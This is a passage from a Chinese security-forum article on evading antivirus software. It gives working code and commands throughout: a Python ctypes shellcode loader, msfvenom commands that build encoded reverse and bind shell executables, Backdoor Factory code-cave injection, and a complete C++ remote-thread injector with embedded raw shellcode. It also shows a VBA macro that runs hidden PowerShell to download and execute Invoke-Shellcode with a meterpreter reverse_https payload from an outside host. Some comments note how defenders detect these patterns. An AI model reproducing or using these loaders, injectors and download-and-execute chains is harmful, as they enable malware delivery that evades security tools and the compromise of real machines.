shellcode=bytearray(sys.argv[1].decode("hex"))
# RWX allocation: 0x40 = PAGE_EXECUTE_READWRITE, 0x3000 = MEM_COMMIT | MEM_RESERVE.
# Hex-encoding the payload changes only its on-disk / command-line form; the
# runtime sequence (RWX alloc -> copy -> thread) is what behavioural detection
# targets and it is unchanged here.
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

# ctypes view over the bytearray for the copy below.
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

# After this copy the decoded payload is resident in an executable region and
# visible to any memory scan.
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))

# Thread start address (third argument) is the allocated region; a thread
# whose start address is not inside a loaded module is the usual detection
# trigger for this pattern.
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))

# Wait with the INFINITE timeout (c_int(-1) == 0xFFFFFFFF) until the thread ends.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

shellcode_encoder

还有一款编码的工具也好用,安利一下:

https://github.com/ecx86/shellcode_encoder

上面是利用编程语言在加载时对shellcode进行编码,也可以选择在生成shellcode的时候就对其编码

举例msfvenom:
kali@kali:~$ msfvenom -l encoder

Framework Encoders [encoder <value>]
======================================

<span class="n">Name</span>                          <span class="n">Rank</span>       <span class="n">Description</span>
<span class="o">----</span>                          <span class="o">----</span>       <span class="o">-----------</span>
<span class="n">cmd</span><span class="o">/</span><span class="n">brace</span>                     <span class="n">low</span>        <span class="n">Bash</span> <span class="n">Brace</span> <span class="n">Expansion</span> <span class="n">Command</span> <span class="n">Encoder</span>
<span class="n">cmd</span><span class="o">/</span><span class="n">echo</span>                      <span class="n">good</span>       <span class="n">Echo</span> <span class="n">Command</span> <span class="n">Encoder</span>
<span class="n">cmd</span><span class="o">/</span><span class="n">generic_sh</span>                <span class="n">manual</span>     <span class="n">Generic</span> <span class="n">Shell</span> <span class="n">Variable</span> <span class="n">Substitution</span> <span class="n">Command</span> <span class="n">Encoder</span>
<span class="n">cmd</span><span class="o">/</span><span class="n">ifs</span>                       <span class="n">low</span>        <span class="n">Bourne</span> <span class="err">$</span><span class="p">{</span><span class="n">IFS</span><span class="p">}</span> <span class="n">Substitution</span> <span class="n">Command</span> <span class="n">Encoder</span>
<span class="n">cmd</span><span class="o">/</span><span class="n">perl</span>                      <span class="n">normal</span>     <span class="n">Perl</span> <span class="n">Command</span> <span class="n">Encoder</span>
<span class="n">cmd</span><span class="o">/</span><span class="n">powershell_base64</span>         <span class="n">excellent</span>  <span class="n">Powershell</span> <span class="n">Base64</span> <span class="n">Command</span> <span class="n">Encoder</span>
<span class="n">cmd</span><span class="o">/</span><span class="n">printf_php_mq</span>             <span class="n">manual</span>     <span class="n">printf</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="n">via</span> <span class="n">PHP</span> <span class="n">magic_quotes</span> <span class="n">Utility</span> <span class="n">Command</span> <span class="n">Encoder</span>
<span class="n">generic</span><span class="o">/</span><span class="n">eicar</span>                 <span class="n">manual</span>     <span class="n">The</span> <span class="n">EICAR</span> <span class="n">Encoder</span>
<span class="n">generic</span><span class="o">/</span><span class="n">none</span>                  <span class="n">normal</span>     <span class="n">The</span> <span class="s2">"none"</span> <span class="n">Encoder</span>
<span class="n">mipsbe</span><span class="o">/</span><span class="n">byte_xori</span>              <span class="n">normal</span>     <span class="n">Byte</span> <span class="n">XORi</span> <span class="n">Encoder</span>
<span class="n">mipsbe</span><span class="o">/</span><span class="n">longxor</span>                <span class="n">normal</span>     <span class="n">XOR</span> <span class="n">Encoder</span>
<span class="n">mipsle</span><span class="o">/</span><span class="n">byte_xori</span>              <span class="n">normal</span>     <span class="n">Byte</span> <span class="n">XORi</span> <span class="n">Encoder</span>
<span class="n">mipsle</span><span class="o">/</span><span class="n">longxor</span>                <span class="n">normal</span>     <span class="n">XOR</span> <span class="n">Encoder</span>
<span class="n">php</span><span class="o">/</span><span class="n">base64</span>                    <span class="n">great</span>      <span class="n">PHP</span> <span class="n">Base64</span> <span class="n">Encoder</span>
<span class="n">ppc</span><span class="o">/</span><span class="n">longxor</span>                   <span class="n">normal</span>     <span class="n">PPC</span> <span class="n">LongXOR</span> <span class="n">Encoder</span>
<span class="n">ppc</span><span class="o">/</span><span class="n">longxor_tag</span>               <span class="n">normal</span>     <span class="n">PPC</span> <span class="n">LongXOR</span> <span class="n">Encoder</span>
<span class="n">ruby</span><span class="o">/</span><span class="n">base64</span>                   <span class="n">great</span>      <span class="n">Ruby</span> <span class="n">Base64</span> <span class="n">Encoder</span>
<span class="n">sparc</span><span class="o">/</span><span class="n">longxor_tag</span>             <span class="n">normal</span>     <span class="n">SPARC</span> <span class="n">DWORD</span> <span class="n">XOR</span> <span class="n">Encoder</span>
<span class="n">x64</span><span class="o">/</span><span class="n">xor</span>                       <span class="n">normal</span>     <span class="n">XOR</span> <span class="n">Encoder</span>
<span class="n">x64</span><span class="o">/</span><span class="n">xor_context</span>               <span class="n">normal</span>     <span class="n">Hostname</span><span class="o">-</span><span class="n">based</span> <span class="n">Context</span> <span class="n">Keyed</span> <span class="n">Payload</span> <span class="n">Encoder</span>
<span class="n">x64</span><span class="o">/</span><span class="n">xor_dynamic</span>               <span class="n">normal</span>     <span class="n">Dynamic</span> <span class="n">key</span> <span class="n">XOR</span> <span class="n">Encoder</span>
<span class="n">x64</span><span class="o">/</span><span class="n">zutto_dekiru</span>              <span class="n">manual</span>     <span class="n">Zutto</span> <span class="n">Dekiru</span>
<span class="n">x86</span><span class="o">/</span><span class="n">add_sub</span>                   <span class="n">manual</span>     <span class="n">Add</span><span class="o">/</span><span class="n">Sub</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">alpha_mixed</span>               <span class="n">low</span>        <span class="n">Alpha2</span> <span class="n">Alphanumeric</span> <span class="n">Mixedcase</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">alpha_upper</span>               <span class="n">low</span>        <span class="n">Alpha2</span> <span class="n">Alphanumeric</span> <span class="n">Uppercase</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">avoid_underscore_tolower</span>  <span class="n">manual</span>     <span class="n">Avoid</span> <span class="n">underscore</span><span class="o">/</span><span class="n">tolower</span>
<span class="n">x86</span><span class="o">/</span><span class="n">avoid_utf8_tolower</span>        <span class="n">manual</span>     <span class="n">Avoid</span> <span class="n">UTF8</span><span class="o">/</span><span class="n">tolower</span>
<span class="n">x86</span><span class="o">/</span><span class="n">bloxor</span>                    <span class="n">manual</span>     <span class="n">BloXor</span> <span class="o">-</span> <span class="n">A</span> <span class="n">Metamorphic</span> <span class="n">Block</span> <span class="n">Based</span> <span class="n">XOR</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">bmp_polyglot</span>              <span class="n">manual</span>     <span class="n">BMP</span> <span class="n">Polyglot</span>
<span class="n">x86</span><span class="o">/</span><span class="n">call4_dword_xor</span>           <span class="n">normal</span>     <span class="n">Call</span><span class="o">+</span><span class="mi">4</span> <span class="n">Dword</span> <span class="n">XOR</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">context_cpuid</span>             <span class="n">manual</span>     <span class="n">CPUID</span><span class="o">-</span><span class="n">based</span> <span class="n">Context</span> <span class="n">Keyed</span> <span class="n">Payload</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">context_stat</span>              <span class="n">manual</span>     <span class="n">stat</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span><span class="o">-</span><span class="n">based</span> <span class="n">Context</span> <span class="n">Keyed</span> <span class="n">Payload</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">context_time</span>              <span class="n">manual</span>     <span class="n">time</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span><span class="o">-</span><span class="n">based</span> <span class="n">Context</span> <span class="n">Keyed</span> <span class="n">Payload</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">countdown</span>                 <span class="n">normal</span>     <span class="n">Single</span><span class="o">-</span><span class="n">byte</span> <span class="n">XOR</span> <span class="n">Countdown</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">fnstenv_mov</span>               <span class="n">normal</span>     <span class="n">Variable</span><span class="o">-</span><span class="n">length</span> <span class="n">Fnstenv</span><span class="o">/</span><span class="n">mov</span> <span class="n">Dword</span> <span class="n">XOR</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">jmp_call_additive</span>         <span class="n">normal</span>     <span class="n">Jump</span><span class="o">/</span><span class="n">Call</span> <span class="n">XOR</span> <span class="n">Additive</span> <span class="n">Feedback</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">nonalpha</span>                  <span class="n">low</span>        <span class="n">Non</span><span class="o">-</span><span class="n">Alpha</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">nonupper</span>                  <span class="n">low</span>        <span class="n">Non</span><span class="o">-</span><span class="n">Upper</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">opt_sub</span>                   <span class="n">manual</span>     <span class="n">Sub</span> <span class="n">Encoder</span> <span class="p">(</span><span class="n">optimised</span><span class="p">)</span>
<span class="n">x86</span><span class="o">/</span><span class="n">service</span>                   <span class="n">manual</span>     <span class="n">Register</span> <span class="n">Service</span>
<span class="n">x86</span><span class="o">/</span><span class="n">shikata_ga_nai</span>            <span class="n">excellent</span>  <span class="n">Polymorphic</span> <span class="n">XOR</span> <span class="n">Additive</span> <span class="n">Feedback</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">single_static_bit</span>         <span class="n">manual</span>     <span class="n">Single</span> <span class="n">Static</span> <span class="n">Bit</span>
<span class="n">x86</span><span class="o">/</span><span class="n">unicode_mixed</span>             <span class="n">manual</span>     <span class="n">Alpha2</span> <span class="n">Alphanumeric</span> <span class="n">Unicode</span> <span class="n">Mixedcase</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">unicode_upper</span>             <span class="n">manual</span>     <span class="n">Alpha2</span> <span class="n">Alphanumeric</span> <span class="n">Unicode</span> <span class="n">Uppercase</span> <span class="n">Encoder</span>
<span class="n">x86</span><span class="o">/</span><span class="n">xor_dynamic</span>               <span class="n">normal</span>     <span class="n">Dynamic</span> <span class="n">key</span> <span class="n">XOR</span> <span class="n">Encoder</span>

使用模板和编码器

for example:

msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/ plink.exe lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o a.exe 

msfvenom -p windows/shell/bind_tcp -x /usr/share/windows-binaries/ plink.exe lhost=1.1.1.1 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86 -platform win -f exe > b.exe

Veil中的加密:

schelper:

Obfuscation:
Invoke-Obfuscation -ScriptBlock {echo xss} -Command 'Encoding\1,Launcher\PS\67' -Quiet


关于shellcode编码后执行就点到这里,其他语言也是大同小异,就不多列举了。

上面是一些编码加密shellcode,下面就看看shellcode注入的技巧方式。

B)shellcode注入混淆

大多数注入免杀还将shellcode进行了拆分

拆分这两个字也很好理解,字面意思上和各位熟悉的php一句话木马免杀大体一样,shellcode就好比php木马中需要拆分的危险函数名

shellcode拆分可以把原本特征明显的程序中的shellcode进行位置替换,最简单的做法比如新增一个区段填入shellcode,将入口点jmp到shellcode地址,执行完后再跳回原程序开头;

也可以将shellcode分段布在各个code cave中再分段执行,原理可以参考egg hunt shellcode的中的Omelet Shellcode


举一些注入例子:

BDF:

https://github.com/secretsquirrel/the-backdoor-factory

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Loading PE in pefile
[*] Parsing data directories
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 410
[*] All caves lengths:  410
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 410
[*] Available caves: 
1. Section Name: DATA; Section Begin: 0x5df200 End: 0x665400; Cave begin: 0x65ea07 End: 0x65ec68; Cave Size: 609
3. Section Name: .rdata; Section Begin: 0x66a000 End: 0x66a200; Cave begin: 0x66a013 End: 0x66a200; Cave Size: 493
4. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8203f End: 0xc82308; Cave Size: 713
5. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc82e1c End: 0xc83050; Cave Size: 564
6. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc830eb End: 0xc83718; Cave Size: 1581
7. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc83b64 End: 0xc840fc; Cave Size: 1432
8. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc843ff End: 0xc846c8; Cave Size: 713
9. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc851dc End: 0xc85410; Cave Size: 564
10. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc854ab End: 0xc859d0; Cave Size: 1317
11. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc86557 End: 0xc86b84; Cave Size: 1581
12. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc86fd0 End: 0xc87568; Cave Size: 1432
13. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8760a End: 0xc87a32; Cave Size: 1064
14. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc886af End: 0xc88d58; Cave Size: 1705
15. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8b8b3 End: 0xc8bdd8; Cave Size: 1317
16. Section Name: .rsrc; Section Begin: 0x66a200 End: 0xd33200; Cave begin: 0xc8eaba End: 0xc8ed65; Cave Size: 683

BDF中的-F参数可以实现多裂缝(code cave)注入。

backdoor-factory -f putty.exe -s show
backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.15.135 -P 4444
shellter:

A 选项增加区段注入

Avet:
root@kali:/tmp/avet/build# leafpad build_win64_meterpreter_rev_tcp_xor_fopen.sh 

lhost=192.168.174.134

root@kali:/tmp/avet/build# cd

root@kali:/tmp/avet# ./build/build_win64_meterpreter_rev_tcp_xor_fopen.sh

No Arch selected, selecting Arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 551 (iteration=0)
x64/xor chosen with final size 551
Payload size: 551 bytes
Final size of c file: 2339 bytes
./build/build_win64_meterpreter_rev_tcp_xor_fopen.sh: line 6: ./make_avet: cannot execute binary file: Exec format error
avet.c: In function ‘main’:
avet.c:122:15: error: ‘buf’ undeclared (first use in this function)
shellcode = buf;
^
avet.c:122:15: note: each undeclared identifier is reported only once for each function it appears in

正常进程注入shellcode

除此之外也可以手动做整个进程的注入:先起一个正常进程,再向其中注入shellcode
例子:

#include "stdafx.h"
#include <Windows.h>
#include<stdio.h>
#include "iostream"
using namespace std;
    // Payload bytes embedded verbatim as a global array. No encoding or encryption is applied,
    // so the exact byte pattern sits in the compiled binary as-is; this is precisely the kind of
    // static signature that file scanners match, and the reason the article's earlier sections
    // argue for keeping payload and loader apart. sizeof(shellcode) includes the implicit NUL
    // terminator that a string-literal initializer adds.
    unsigned char shellcode[] =
        "\xb8\x72\xd9\xb8\x52\xda\xd8\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
        "\x56\x83\xc2\x04\x31\x42\x0f\x03\x42\x7d\x3b\x4d\xae\x69\x39"
        "\xae\x4f\x69\x5e\x26\xaa\x58\x5e\x5c\xbe\xca\x6e\x16\x92\xe6"
        "\x05\x7a\x07\x7d\x6b\x53\x28\x36\xc6\x85\x07\xc7\x7b\xf5\x06"
        "\x4b\x86\x2a\xe9\x72\x49\x3f\xe8\xb3\xb4\xb2\xb8\x6c\xb2\x61"
        "\x2d\x19\x8e\xb9\xc6\x51\x1e\xba\x3b\x21\x21\xeb\xed\x3a\x78"
        "\x2b\x0f\xef\xf0\x62\x17\xec\x3d\x3c\xac\xc6\xca\xbf\x64\x17"
        "\x32\x13\x49\x98\xc1\x6d\x8d\x1e\x3a\x18\xe7\x5d\xc7\x1b\x3c"
        "\x1c\x13\xa9\xa7\x86\xd0\x09\x0c\x37\x34\xcf\xc7\x3b\xf1\x9b"
        "\x80\x5f\x04\x4f\xbb\x5b\x8d\x6e\x6c\xea\xd5\x54\xa8\xb7\x8e"
        "\xf5\xe9\x1d\x60\x09\xe9\xfe\xdd\xaf\x61\x12\x09\xc2\x2b\x7a"
        "\xfe\xef\xd3\x7a\x68\x67\xa7\x48\x37\xd3\x2f\xe0\xb0\xfd\xa8"
        "\x71\xd6\xfd\x67\x39\xb7\x03\x88\x39\x91\xc7\xdc\x69\x89\xee"
        "\x5c\xe2\x49\x0e\x89\x9e\x43\x98\xf2\xf6\xfa\xdc\x9b\x04\x03"
        "\xcc\x07\x81\xe5\xbe\xe7\xc1\xb9\x7e\x58\xa1\x69\x17\xb2\x2e"
        "\x55\x07\xbd\xe5\xfe\xa2\x52\x53\x56\x5b\xca\xfe\x2c\xfa\x13"
        "\xd5\x48\x3c\x9f\xdf\xad\xf3\x68\xaa\xbd\xe4\x0e\x54\x3e\xf5"
        "\xba\x54\x54\xf1\x6c\x03\xc0\xfb\x49\x63\x4f\x03\xbc\xf0\x88"
        "\xfb\x41\xc0\xe3\xca\xd7\x6c\x9c\x32\x38\x6c\x5c\x65\x52\x6c"
        "\x34\xd1\x06\x3f\x21\x1e\x93\x2c\xfa\x8b\x1c\x04\xae\x1c\x75"
        "\xaa\x89\x6b\xda\x55\xfc\xef\x1d\xa9\x82\xc7\x85\xc1\x7c\x58"
        "\x36\x11\x17\x58\x66\x79\xec\x77\x89\x49\x0d\x52\xc2\xc1\x84"
        "\x33\xa0\x70\x98\x19\x64\x2c\x99\xae\xbd\xdf\xe0\xdf\x42\x20"
        "\x15\xf6\x26\x21\x15\xf6\x58\x1e\xc3\xcf\x2e\x61\xd7\x6b\x20"
        "\xd4\x7a\xdd\xab\x16\x28\x1d\xfe";
<span class="c1">// Demonstrates the classic remote-thread injection chain: spawn a benign program suspended,</span>
<span class="c1">// allocate RWX memory inside it, copy the global shellcode[] across, and start a thread there.</span>
<span class="c1">// Returns bRet, which is initialised to FALSE and returned unchanged on every path shown.</span>
<span class="c1">// Defender note: the sequence CreateProcess(CREATE_SUSPENDED) -> VirtualAllocEx(RWX) -></span>
<span class="c1">// WriteProcessMemory -> CreateRemoteThread is exactly what EDR behavioural rules and the API</span>
<span class="c1">// hooks the article mentions later are built to catch; each step is also visible in ETW/Sysmon telemetry.</span>
<span class="n">BOOL</span> <span class="nf">injection</span><span class="p">()</span>
<span class="p">{</span>
    <span class="kt">wchar_t</span> <span class="n">Cappname</span><span class="p">[</span><span class="n">MAX_PATH</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="n">STARTUPINFO</span> <span class="n">si</span><span class="p">;</span>
    <span class="n">PROCESS_INFORMATION</span> <span class="n">pi</span><span class="p">;</span>
    <span class="n">LPVOID</span> <span class="n">lpMalwareBaseAddr</span><span class="p">;</span>
    <span class="n">LPVOID</span> <span class="n">lpnewVictimBaseAddr</span><span class="p">;</span>
    <span class="n">HANDLE</span> <span class="n">hThread</span><span class="p">;</span>
    <span class="n">DWORD</span> <span class="n">dwExitCode</span><span class="p">;</span>
    <span class="n">BOOL</span> <span class="n">bRet</span> <span class="o">=</span> <span class="n">FALSE</span><span class="p">;</span>

    <span class="c1">// Source buffer is the global shellcode[] array defined above.</span>
    <span class="n">lpMalwareBaseAddr</span> <span class="o">=</span> <span class="n">shellcode</span><span class="p">;</span>

    <span class="c1">// Target is calc.exe inside the system directory (typically System32); the path is printed for the operator.</span>
    <span class="n">GetSystemDirectory</span><span class="p">(</span><span class="n">Cappname</span><span class="p">,</span> <span class="n">MAX_PATH</span><span class="p">);</span>
    <span class="n">_tcscat</span><span class="p">(</span><span class="n">Cappname</span><span class="p">,</span> <span class="sa">L</span><span class="s">"</span><span class="se">\\</span><span class="s">calc.exe"</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Injection program Name:%S</span><span class="se">\r\n</span><span class="s">"</span><span class="p">,</span> <span class="n">Cappname</span><span class="p">);</span>

    <span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&amp;</span><span class="n">si</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">si</span><span class="p">));</span>
    <span class="n">si</span><span class="p">.</span><span class="n">cb</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">si</span><span class="p">);</span>
    <span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&amp;</span><span class="n">pi</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">pi</span><span class="p">));</span>

    <span class="c1">// Create the child suspended so its primary thread never runs the real calc.exe code; a failed CreateProcess returns FALSE.</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">CreateProcess</span><span class="p">(</span><span class="n">Cappname</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span>
        <span class="n">FALSE</span><span class="p">,</span> <span class="n">CREATE_SUSPENDED</span>
        <span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">si</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pi</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="k">return</span> <span class="n">bRet</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Reserve and commit an RWX region in the child large enough for the payload plus one byte.</span>
    <span class="n">lpnewVictimBaseAddr</span> <span class="o">=</span> <span class="n">VirtualAllocEx</span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="n">hProcess</span>
        <span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">shellcode</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span>
        <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">lpnewVictimBaseAddr</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="k">return</span> <span class="n">bRet</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Copy the payload into the child's RWX region (cross-process write; return value not checked).</span>
    <span class="n">WriteProcessMemory</span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="n">hProcess</span><span class="p">,</span> <span class="n">lpnewVictimBaseAddr</span><span class="p">,</span>
        <span class="p">(</span><span class="n">LPVOID</span><span class="p">)</span><span class="n">lpMalwareBaseAddr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">shellcode</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>

    <span class="c1">// Start a new thread in the child whose entry point is the freshly written region.</span>
    <span class="n">hThread</span> <span class="o">=</span> <span class="n">CreateRemoteThread</span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="n">hProcess</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span>
        <span class="p">(</span><span class="n">LPTHREAD_START_ROUTINE</span><span class="p">)</span><span class="n">lpnewVictimBaseAddr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>

    <span class="c1">// Block on pi.hThread, read the child's exit code, then terminate the child; bRet is still FALSE here.</span>
    <span class="n">WaitForSingleObject</span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="n">hThread</span><span class="p">,</span> <span class="n">INFINITE</span><span class="p">);</span>
    <span class="n">GetExitCodeProcess</span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="n">hProcess</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">dwExitCode</span><span class="p">);</span>
    <span class="n">TerminateProcess</span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="n">hProcess</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
    <span class="k">return</span> <span class="n">bRet</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Prints a one-line banner describing the tool. proc is the program name as passed in argv[0].</span>
<span class="kt">void</span> <span class="nf">help</span><span class="p">(</span><span class="kt">char</span><span class="o">*</span> <span class="n">proc</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"%s:[-] start a process and injection shellcode to memory</span><span class="se">\r\n</span><span class="s">"</span><span class="p">,</span> <span class="n">proc</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Entry point: prints the banner and runs injection() once; injection()'s BOOL result is discarded</span>
<span class="c1">// and no explicit return value is given (main implicitly returns 0).</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">argv</span><span class="p">[])</span>
<span class="p">{</span>
    <span class="n">help</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
    <span class="n">injection</span><span class="p">();</span>
<span class="p">}</span>

注入就举例到这里,思考一下如果是针对hook函数的检测该怎么替换呢,可以进行函数替换,比如win api中可以替换VirtualAlloc的函数就很多:

0x03 技巧组合

上面说了一些技巧,无论是分离中加载器运行shellcode、白利用运行恶意程序,还是将shellcode编码、加密、注入,对免杀都会有一定效果,单一使用某个技巧的话或多或少会有一定的缺陷

那么将各个技巧结合起来达到最好的效果是我们需要思考的事情

举个好用的例子:

Powershell-Payload-Excel-Delivery

https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/

这就是使用shellcode调用graeber的VBA宏,在内存中执行powershell(可以使用编码),达到后门持久化

Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
        objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/Invoke-Shellcode')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.127 -Lport 1111 -Force", Null, objConfig, intProcessID

C:\PS> Start-Process C:\Windows\SysWOW64\notepad.exe -WindowStyle Hidden
C:\PS> $Proc = Get-Process notepad
C:\PS> Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 443 -Verbose

VERBOSE: Requesting meterpreter payload from https://192.168.30.129:443/INITM
VERBOSE: Injecting shellcode into PID: 4004
VERBOSE: Injecting into a Wow64 process.
VERBOSE: Using 32-bit shellcode.
VERBOSE: Shellcode memory reserved at 0x03BE0000
VERBOSE: Emitting 32-bit assembly call stub.
VERBOSE: Thread call stub memory reserved at 0x001B0000
VERBOSE: Shellcode injection complete!

技巧方法是死的,思路是活的,希望此文可以达到抛砖引玉的目的,在实际环境下也需要各位师傅将多个技巧结合灵活的思路达到想要的成果。

文末推个个人博客,欢迎友链

https://www.cnblogs.com/-qing-/

完。

        </div>
        

        <div class="post-user-action">
            <span class="btn btn-default pull-right" id="mark" data-action="topic" data-pk="7170">
                <span id="mark-text">点击收藏 </span><span class="i-seprator"> | </span><span id="mark-count">5</span>
            </span>
            
                <span class="btn btn-default pull-right" id="follow_topic" data-pk="7170">
                 <span>关注</span><span class="i-seprator"> | </span><span id="follow-count">2</span>
                </span>
            
            <div class="clearfix"></div>
        </div>
        
        <div class="related-section">
            <div class="related-box">
                
                <span><a class="pull-left" href="/t/7162" title="Ripstech Java Security 2019 Calendar复现系列(二)"><span class="related-label" style="padding: 3px 4px;margin-right: 3px;">上一篇:</span>Ripstech Java Sec...</a></span>
                
                
                <span><a class="pull-left" href="/t/7169" title="对MYSQL注入相关内容及部分Trick的归类小结"><span class="related-label" style="">下一篇:</span>对MYSQL注入相关内容及部分Tr...</a></span>
                 
            </div>
        </div>
    
    </div>
</div>
<!-- topic & appendix -->
        <ul>
            <li style="min-height: 50px;line-height: 60px;margin-left: 15px"><strong>动动手指,沙发就是你的了!</strong></li>
        </ul>
    
</div>
<!-- posts of topic -->

    <div class="row box" id="reply-box">
        
        <div class="box-container clearfix">
            
                <div class="reminder">
                    <a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F7170&amp;from_type=xianzhi"><strong>登录</strong></a> 后跟帖
                </div>
            
        </div>
    </div>

<!-- editor for post -->


    </div>
    <div class="span3 pull-right offset sidebar">
        

